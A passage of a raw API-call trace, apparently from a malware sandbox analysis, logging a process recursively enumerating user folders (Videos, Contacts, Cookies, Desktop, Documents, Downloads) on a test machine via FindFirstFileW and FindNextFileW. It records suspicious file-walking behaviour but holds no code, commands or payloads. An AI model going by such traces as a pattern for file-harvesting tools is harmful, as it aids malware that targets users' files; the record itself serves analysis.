ftLastWriteTime.dwLowDateTime=0xf8dea030, ftLastWriteTime.dwHighDateTime=0x1d5dc58, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71f110 [0071.931] FindNextFileW (in: hFindFile=0x71f110, lpFindFileData=0x737b58 | out: lpFindFileData=0x737b58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296dc130, ftCreationTime.dwHighDateTime=0x1d5d836, ftLastAccessTime.dwLowDateTime=0xf8dea030, ftLastAccessTime.dwHighDateTime=0x1d5dc58, ftLastWriteTime.dwLowDateTime=0xf8dea030, ftLastWriteTime.dwHighDateTime=0x1d5dc58, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.931] FindClose (in: hFindFile=0x71f110 | out: hFindFile=0x71f110) returned 1 [0071.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x737b58 | out: hHeap=0x6d0000) returned 1 [0071.931] FindNextFileW (in: hFindFile=0x71f0d0, lpFindFileData=0x736650 | out: lpFindFileData=0x736650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4d37d00, ftCreationTime.dwHighDateTime=0x1d5dbae, ftLastAccessTime.dwLowDateTime=0xbb001fb0, ftLastAccessTime.dwHighDateTime=0x1d5dd74, ftLastWriteTime.dwLowDateTime=0xbb001fb0, ftLastWriteTime.dwHighDateTime=0x1d5dd74, nFileSizeHigh=0x0, nFileSizeLow=0x18dc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="dDbkiu27Nt.flv", cAlternateFileName="DDBKIU~1.FLV")) returned 1 [0071.932] FindClose (in: hFindFile=0x71f0d0 | out: hFindFile=0x71f0d0) returned 1 [0071.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x736650 | out: hHeap=0x6d0000) returned 1 [0071.932] FindNextFileW (in: hFindFile=0x71f090, lpFindFileData=0x735198 | out: lpFindFileData=0x735198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0bb6f00, ftCreationTime.dwHighDateTime=0x1d5e126, ftLastAccessTime.dwLowDateTime=0xc9fdf1b0, ftLastAccessTime.dwHighDateTime=0x1d5e58d, ftLastWriteTime.dwLowDateTime=0xc9fdf1b0, ftLastWriteTime.dwHighDateTime=0x1d5e58d, nFileSizeHigh=0x0, nFileSizeLow=0x63eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="L14QnkKkvVL.mp4", cAlternateFileName="L14QNK~1.MP4")) returned 1 [0071.932] FindClose (in: hFindFile=0x71f090 | out: hFindFile=0x71f090) returned 1 [0071.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0071.932] FindNextFileW (in: hFindFile=0x71f050, lpFindFileData=0x717d58 | out: lpFindFileData=0x717d58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e0c3050, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0x2c57c1d0, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x2c57c1d0, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590051, dwReserved1=0x63004e, cFileName="qw2j6PLqnK", cAlternateFileName="QW2J6P~1")) returned 1 [0071.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\qw2j6PLqnK\\*", lpFindFileData=0x7368c8 | out: lpFindFileData=0x7368c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e0c3050, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0x2c57c1d0, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x2c57c1d0, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71f090 [0071.932] FindNextFileW (in: hFindFile=0x71f090, lpFindFileData=0x7368c8 | out: lpFindFileData=0x7368c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e0c3050, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0x2c57c1d0, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x2c57c1d0, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.932] FindClose (in: hFindFile=0x71f090 | out: hFindFile=0x71f090) returned 1 [0071.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7368c8 | out: hHeap=0x6d0000) returned 1 [0071.932] FindNextFileW (in: hFindFile=0x71f050, lpFindFileData=0x717d58 | out: lpFindFileData=0x717d58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e0c3050, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0x2c57c1d0, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x2c57c1d0, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590051, dwReserved1=0x63004e, cFileName="qw2j6PLqnK", cAlternateFileName="QW2J6P~1")) returned 0 [0071.932] FindClose (in: hFindFile=0x71f050 | out: hFindFile=0x71f050) returned 1 [0071.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d58 | out: hHeap=0x6d0000) returned 1 [0071.932] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2886d4d0, ftCreationTime.dwHighDateTime=0x1d5e7a6, ftLastAccessTime.dwLowDateTime=0x284ce7a0, ftLastAccessTime.dwHighDateTime=0x1d5d8d5, ftLastWriteTime.dwLowDateTime=0x284ce7a0, ftLastWriteTime.dwHighDateTime=0x1d5d8d5, nFileSizeHigh=0x0, nFileSizeLow=0x7151, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName="7DlDbAQsToVfE 4-hBa4.avi", cAlternateFileName="7DLDBA~1.AVI")) returned 1 [0071.932] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0071.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0071.933] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e67400, ftCreationTime.dwHighDateTime=0x1d5da79, ftLastAccessTime.dwLowDateTime=0x6b0b11b0, ftLastAccessTime.dwHighDateTime=0x1d5de5d, ftLastWriteTime.dwLowDateTime=0x6b0b11b0, ftLastWriteTime.dwHighDateTime=0x1d5de5d, nFileSizeHigh=0x0, nFileSizeLow=0x12450, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName="WbWsLJMUqxS9.mp4", cAlternateFileName="WBWSLJ~1.MP4")) returned 1 [0071.933] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7173f0 | out: hHeap=0x6d0000) returned 1 [0071.933] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9155cc80, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xb81b38c0, ftLastAccessTime.dwHighDateTime=0x1d5dd33, ftLastWriteTime.dwLowDateTime=0xb81b38c0, ftLastWriteTime.dwHighDateTime=0x1d5dd33, nFileSizeHigh=0x0, nFileSizeLow=0x3882, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="jL qIjg.mp4", cAlternateFileName="JLQIJG~1.MP4")) returned 1 [0071.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\onNt0X\\*", lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91ae78f0, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0xf9c2fa80, ftLastAccessTime.dwHighDateTime=0x1d5e510, ftLastWriteTime.dwLowDateTime=0xf9c2fa80, ftLastWriteTime.dwHighDateTime=0x1d5e510, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.933] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x7173f0 | out: lpFindFileData=0x7173f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91ae78f0, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0xf9c2fa80, ftLastAccessTime.dwHighDateTime=0x1d5e510, ftLastWriteTime.dwLowDateTime=0xf9c2fa80, ftLastWriteTime.dwHighDateTime=0x1d5e510, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660056, dwReserved1=0x34006d, cFileName="..", cAlternateFileName="")) returned 1 [0071.933] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7173f0 | out: hHeap=0x6d0000) returned 1 [0071.933] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc57abba0, ftCreationTime.dwHighDateTime=0x1d5e13c, ftLastAccessTime.dwLowDateTime=0x15158760, ftLastAccessTime.dwHighDateTime=0x1d5ddb1, ftLastWriteTime.dwLowDateTime=0x15158760, ftLastWriteTime.dwHighDateTime=0x1d5ddb1, nFileSizeHigh=0x0, nFileSizeLow=0x6496, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="Q4qjzsKde1yg4RDN.swf", cAlternateFileName="Q4QJZS~1.SWF")) returned 1 [0071.933] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0071.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.933] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd91656c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd91656c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0071.933] FindClose (in: hFindFile=0x70b890 | out: hFindFile=0x70b890) returned 1 [0071.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.933] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0071.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71ef90 [0071.934] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x6f57c8, ftCreationTime.dwHighDateTime=0x1d5e76f, ftLastAccessTime.dwLowDateTime=0x56f13d00, ftLastAccessTime.dwHighDateTime=0x1d5e202, ftLastWriteTime.dwLowDateTime=0x56f13d00, ftLastWriteTime.dwHighDateTime=0x1d5e202, nFileSizeHigh=0x0, nFileSizeLow=0x7a01, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="SeIM2zH.mkv", cAlternateFileName="")) returned 0xffffffff [0071.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.934] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0071.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.935] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.935] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.935] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0071.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717b00, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0071.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.935] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0071.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.936] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.936] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.936] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0071.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.937] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e61e, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0xfbda96b0, ftLastAccessTime.dwHighDateTime=0x1d5e49e, ftLastWriteTime.dwLowDateTime=0xfbda96b0, ftLastWriteTime.dwHighDateTime=0x1d5e49e, nFileSizeHigh=0x0, nFileSizeLow=0x71ca, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName="vLaYCIBHP3FGy1qS6NL.flv", cAlternateFileName="VLAYCI~1.FLV")) returned 0xffffffff [0071.937] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0071.937] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0071.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0xfbda96b0, ftLastAccessTime.dwHighDateTime=0x1d5e49e, ftLastWriteTime.dwLowDateTime=0xfbda96b0, ftLastWriteTime.dwHighDateTime=0x1d5e49e, nFileSizeHigh=0x0, nFileSizeLow=0x71ca, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName="vLaYCIBHP3FGy1qS6NL.flv", cAlternateFileName="VLAYCI~1.FLV")) returned 0xffffffff [0071.937] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0071.937] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0071.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x717b00 | out: lpFindFileData=0x717b00*(dwFileAttributes=0x736c48, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d5e69b, ftLastAccessTime.dwLowDateTime=0xfbda96b0, ftLastAccessTime.dwHighDateTime=0x1d5e49e, ftLastWriteTime.dwLowDateTime=0xfbda96b0, ftLastWriteTime.dwHighDateTime=0x1d5e49e, nFileSizeHigh=0x0, nFileSizeLow=0x71ca, dwReserved0=0x1d5e577, dwReserved1=0x2294be60, cFileName="vLaYCIBHP3FGy1qS6NL.flv", cAlternateFileName="VLAYCI~1.FLV")) returned 0xffffffff [0071.937] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0071.937] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0071.938] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.939] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0071.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.939] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.939] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0071.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0071.939] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 